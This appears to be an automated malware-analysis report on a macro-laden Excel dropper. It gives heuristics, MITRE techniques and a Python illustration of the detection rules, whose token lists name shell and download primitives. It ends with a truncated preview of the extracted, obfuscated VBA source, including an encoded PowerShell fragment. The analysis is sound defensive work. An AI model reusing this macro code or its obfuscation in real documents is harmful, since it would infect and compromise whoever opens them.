MALICIOUS (Risk Score 220)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
ClamAV identifies the file as malware (Xls.Dropper.Rvaj-6855468-0), and the embedded VBA macros trigger critical heuristics: a Workbook_Open event handler, which runs automatically as soon as the workbook is opened (provided macros are enabled), and a call to the Shell() function, which executes an external command. Together they form the classic dropper pattern: the auto-exec handler fires the Shell() call, most likely to fetch and run a secondary payload. The extracted source previewed below is assembled from concatenated, obfuscated string literals rather than readable commands, consistent with the command being decoded at run time immediately before execution. Documents of this kind are typically delivered as spearphishing attachments.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Xls.Dropper.Rvaj-6855468-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Dropper.Rvaj-6855468-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
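To make the two macro heuristics above concrete, here is an added Python illustration; it is not the analyzer's code and not oletools. It applies the Workbook_Open and Shell() checks to decoded VBA source and, separately, the auto-exec plus execution-token co-occurrence check to a raw compiled-VBA/cache stream where no source is recoverable. The heuristic IDs are borrowed from this report for readability; the macro text and the byte stream are constructed samples, and `Decode` in the sample macro is a hypothetical placeholder for whatever string-unscrambling routine a real sample would carry.

```python
"""Added illustration of the macro heuristics in this report: the Workbook_Open
and Shell() checks over decoded VBA source, and the auto-exec + execution-token
co-occurrence check over a raw p-code/cache stream. Not the analyzer's or
oletools' code; heuristic IDs are borrowed from the report for readability."""
import re

AUTOEXEC_NAMES = ("Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen", "AutoExec")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "URLDownloadToFile", "XMLHTTP", "powershell")
SEVERITY = {"OLE_VBA_SHELL": "critical", "OLE_VBA_WBOPEN": "high",
            "OLE_VBA_AUTOEXEC": "high", "OLE_VBA_PCODE_AUTOEXEC_EXEC": "high"}
RANK = {"none": 0, "high": 1, "critical": 2}

# Constructed sample macro: the trigger/primitive pair the report describes.
# Decode() is a hypothetical placeholder for the string-unscrambling routine.
SAMPLE_SRC = '''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    cmd = Decode(payload)
    r = Shell(cmd, vbHide)
End Sub
'''
# Constructed benign-looking macro: auto-exec handler, no execution primitive.
BENIGN_SRC = '''Private Sub Workbook_Open()
    Application.Calculate
End Sub
'''
# Constructed stand-in for a compiled-VBA stream: identifiers appear as UTF-16LE
# or ASCII strings between opaque bytes, with no recoverable source.
SAMPLE_STREAM = (b"\x01\x16\x03\x00" + "Workbook_Open".encode("utf-16le")
                 + b"\x00\x00\x4d\x00" + b"CreateObject" + b"\x00\x1f"
                 + b"WScript.Shell" + b"\x00")


def scan_vba_source(src):
    """Heuristics over decoded VBA source. Returns {heuristic_id: evidence}."""
    hits = {}
    names = "|".join(AUTOEXEC_NAMES)
    m = re.search(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(" + names + r")\b",
                  src, re.I | re.M)
    if m:
        hid = "OLE_VBA_WBOPEN" if m.group(1).lower() == "workbook_open" else "OLE_VBA_AUTOEXEC"
        hits[hid] = m.group(1)
    # Shell as a function call "Shell(...)" or as a statement "Shell cmd, vbHide"
    m = re.search(r"(?:\bShell\s*\(|^\s*(?:Call\s+)?Shell\b)", src, re.I | re.M)
    if m:
        hits["OLE_VBA_SHELL"] = m.group(0).strip()
    return hits


def scan_pcode_stream(blob):
    """Token co-occurrence over a raw stream: fires only when an auto-exec name
    and an execution/download/object token are both present, in ASCII or
    UTF-16LE, case-insensitively. Needs no decoded source."""
    low = blob.lower()  # lowercases ASCII letters only, which is all we need

    def present(tok):
        t = tok.lower()
        return t.encode("ascii") in low or t.encode("utf-16le") in low

    auto = [t for t in AUTOEXEC_NAMES if present(t)]
    execs = [t for t in EXEC_TOKENS if present(t)]
    return {"OLE_VBA_PCODE_AUTOEXEC_EXEC": auto + execs} if auto and execs else {}


def verdict(hits):
    """Highest severity among hits, escalated to critical when an auto-exec
    trigger and an execution primitive co-occur (the dropper pattern)."""
    if not hits:
        return "none"
    level = max((SEVERITY[h] for h in hits), key=RANK.__getitem__)
    has_auto = any(h in ("OLE_VBA_WBOPEN", "OLE_VBA_AUTOEXEC",
                         "OLE_VBA_PCODE_AUTOEXEC_EXEC") for h in hits)
    has_exec = any(h in ("OLE_VBA_SHELL", "OLE_VBA_PCODE_AUTOEXEC_EXEC") for h in hits)
    return "critical" if has_auto and has_exec else level


if __name__ == "__main__":
    for label, hits in (("sample source", scan_vba_source(SAMPLE_SRC)),
                        ("benign source", scan_vba_source(BENIGN_SRC)),
                        ("p-code stream", scan_pcode_stream(SAMPLE_STREAM))):
        print(f"{label}: {hits} -> {verdict(hits)}")
```

The benign sample shows why the report scores Workbook_Open alone as high rather than critical: an auto-exec handler is only a trigger, and it is the co-occurrence with an execution primitive that makes the document a dropper. The stream scanner is deliberately crude (plain substring search in two encodings) because its job is to keep firing when source extraction has failed, which is exactly the case the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic exists for.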
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8869 bytes |

SHA-256 (macros.bas): 274c0ee79cd159fe5da8a88e31fc9f2a9936afb0bcc1f534eea886337299e77d
Preview: first 1,000 lines of the extracted script (macros.bas)

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function dWindow()
Filters = ", 101, 56,801 , 501 , 101, 011,611, 93,93, 14,14 , 64 , 43 , 97, 089,76,84 , 521, 321, 94 ,521, 321, 05 ,521,43, 54,201, 23, 93 , 93, 66,121, 611 , 101,93, 93 , 44 ,93 , 93, 8 , 69, 501 ,521,44, 93 ,93,19 ,93, 93 , 44 , 93,93 ,411,101 ,93 , 93 , 14, 23 , 04,43 , 321 ,801 ,43 ,04 ,63, 321 , 18 , 69 , 501 ,021, 69 , 101,8 ,521,64,43,301,96 , 611 , 086 , 69,58,521 ,16,63 , 321 ,8,69 ,484, 64 ,64 ,05 ,94 , 75, 14, 14,321, 63 ,321,984, 64 , 64 , 05, 25,14 , 421, 64, 04,93 ,93 , 73 ,93 ,93 , 14, 321 ,201,111, 411, 101 , 79 , 99,401 ,04,63 , 321 ,311,69,37 , 521 , 23,501,011, 04, 84,95,04 ,84 , 84 ,521 ,321 ,94 ,521 ,43, 54, 201 , 93 ,93 , 37,93,93,44,93 , 93 ,39 ,93,93,14 , 23 ,35, 35,83, 04 ,43,321 ,89 , 79 ,011, 001, 23, 94,35, 14 , 14 , 521 , 521 , 95 ,8,521,64 ,43, 301 ,43 ,23,54,89,111 , 411 , 04,63,321 , 121,489,79 , 011, 001,94 ,35 ,14 , 24, 94 , 45, 14 ,54, 8 , 521, 64,43 ,66,43 , 54 , 8,43 , 04, 04,63 ,321,121,69,485 , 43 , 07,6"
errorcheck = "7 ,69 , 97,111,285, 84 ,34, 63,321 ,311 ,501 ,521, 39 ,16,04 , 19, 901, 79 ,611 ,401,39,89 , 411 ,101 ,79 ,701 , 521 ,521, 44 ,63 ,321 , 59 , 521, 14 ,95, 63 ,321,96 ,521, 19 , 63 ,321 ,59 ,521, 24 , 05,05 , 84 , 64 ,64 , 35 ,15 , 94 , 45, 39 ,14,14,95,87 ,301,43 ,04 , 63,321,96,521,19 , 8, 37 , 69 , 8, 28,511,48 , 76,69 , 501, 501, 43 ,64 , 43 , 301 , 69, 101 ,485, 43 , 79, 385 ,8 ,101 , 021 , 611 , 64 ,96 , 011 , 99, 111,001 , 501 ,011 ,301 , 39,8 , 121,511 , 611, 101 , 901 ,64 ,48 ,93,93,14, 04, 19 ,38801 ,211, 511, 54,23, 93,93 ,93, 96 , 8,97 ,76,43 , 64 , 521 ,99 ,411,321, 63, 04, 54,64, 64 , 94, 54, 19 ,521, 76, 411 , 321, 63 ,23 , 16, 23, 521 ,201,07 , 69, 96,321 ,63 ,95, 43,44 , 43 ,23 , 611, 501 , 87 , 69,58,801 ,43, 64 , 521,07,07,69, 101, 321, 63 , 04, 54,64,64,94, 54,19,521,07 , 07 ,69 ,101 , 321,63,16, 521,111, 67 ,321 , 63 , 95,43 ,44 , 43, 23 ,011 ,501 , 111 , 601 , 54 ,23 , 39 , 14,43 ,487 ,101 ,83 , 95 , 43 , 43 ,23, 01"
verificationsring = "1 ,501 , 111 , 601, 54,23 ,39 , 14,43, 27, 611 , 301 , 69 ,84,321,43 , 04, 801 , 321 ,63 , 04, 14 ,93 , 021 , 93 ,44,93 , 101, 501 ,93 ,23 ,201 ,54,23 ,43,521,94 ,321 ,521, 8 ) ) )14 ,521 , 97 ,' -sp" + HelpVisual
dWindow = Filters + errorcheck + verificationsring
End Function
Function Reports()
Reports = FindCtrl + "21,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' (""nIo`j""::]GnIRTs[()''''nIOJ-''x''+]3,1[)(""gni`R`tSoT"".}ECNerE`F`ErPEsoB`rEV{$ ( . 83,04, 43 ,321, 84 , 521,43,54 ,201, 23 , 93, 93 ,101,401 ,93,93, 44 ,801,93,93,14 , 23 , 04,43 ,321 , 94 , 521,321 , 84 , 521 , 43 , 23,54 , 201, 93 ,93 , 99 ,611 ,93,93 , 44 , 93, 93,79,8 , 121 , 211 ,101, 93 , 93 ,44, 93 ,93 ,601 ,101,93,93 ,44 , 93,93 ,411 , 93, 93,14, 23,04 , 43 , 321, 05 , 521 ,321,94,521 ,321 ,84 , 521, 43 , 23 ,54,201 , 93, 93 ,54,489,93,93 ,14, 95 , 64, 04 , 43 ,321, 94 , 521 , 321 ,05, 521, 321,87, 101,911 ,54, 97,86 ,93,93 ,44 ,93 , 93 , 56, 001,93,93,44 , 93,93 ,84, 521, 321,94,521 , 43,23 , 54 ,201, 93 ,93 ,64, 87, 79 ,901 , 101 , 23, 04, 43, 321,05 , 521, 321, 801 ,121,89 , 86,93,93,44,93, 93 , 411 ,79 , 911 ,501 ,011, 301 ,93 , 93 , 44 , 93, 93,001 ,93 , 93 , 14 ,23,54,56 ,511 ,511, 101, 901,84 , 521 ,321 ,45, 52"
End Function
Function LeftAnd()
PrintPAges = "1,43 ,54, 201 ,23 , 93 , 93 , 8 ,521 , 16 , 04,04 , 43, 321 , 05, 521 , 321,25 ,521,321 ,94, 521, 321, 15,521, 321,35,521,321 ,8,69 , 38 ,121 ,511 ,611,101,901,93 , 93 , 14 ,95 ,63,321 , 485,93 ,93 ,44 ,93, 93 ,711,411 ,64 , 99, 111, 901 , 74,93,93 ,44 , 93 , 93,401,611,611 , 211 , 511, 93,93 , 44,93, 93, 74,74 ,501,64,501 ,901,301, 93 ,93, 44,93 ,93, 38 , 93 ,93 , 44, 93, 93 ,8 ,511, 984, 98 , 76,84,521,321,45, 521, 321,65 ,521 ,43 , 23 ,54, 201,23 , 93, 93 ,311,67 ,93, 93 ,44,93,93 , 64, 211 ,011, 301,93, 93,
```
... (truncated)